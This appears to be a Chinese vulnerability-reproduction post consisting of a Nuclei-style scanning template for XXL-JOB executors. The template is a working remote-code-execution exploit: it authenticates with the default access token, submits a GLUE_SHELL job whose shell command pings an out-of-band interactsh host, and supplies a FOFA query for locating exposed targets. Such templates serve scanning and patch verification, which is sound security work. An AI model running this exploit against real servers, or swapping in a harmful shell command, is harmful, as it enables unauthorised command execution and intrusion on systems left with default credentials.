【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞

id: xxl-job-executor-default-accessToken-RCE

info:  name: xxl-job-executor-default-accessToken-RCE  author: known  severity: high  description: XXL-JOB 默认 accessToken 身份绕过，可导致 RCE  metadata:    max-request: 1    verified: true    fofa-query: app="XXL-JOB"  tags: xxl-job,rce

variables:  filename: "{{to_lower(rand_base(10))}}"  servicename: "{{to_lower(rand_base(20))}}"  randjobid: "{{rand_int(999,999999)}}"  datetime: '{{date_time("%Y-%M-%D %H:%m:%s")}}'  unix_time: '{{date_time("{{datetime}}",unix_time())}}'http:  - raw:      - |        @timeout: 25s        POST /run HTTP/1.1        Host: {{Host}}:9999        XXL-JOB-ACCESS-TOKEN: default_token        Content-Type: application/json

        {          "jobId": {{randjobid}},          "executorHandler": "demoJobHandler",          "executorParams": "demoJobHandler",          "executorBlockStrategy": "COVER_EARLY",          "executorTimeout": 0,          "logId": {{randjobid}},          "logDateTime": {{unix_time}},          "glueType": "GLUE_SHELL",          "glueSource": "ping {{Host}}.{{randjobid}}.{{interactsh-url}}",          "glueUpdatetime": {{unix_time}},          "broadcastIndex": 0,          "broadcastTotal": 0        }

    req-condition: true    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol        words:          - "dns"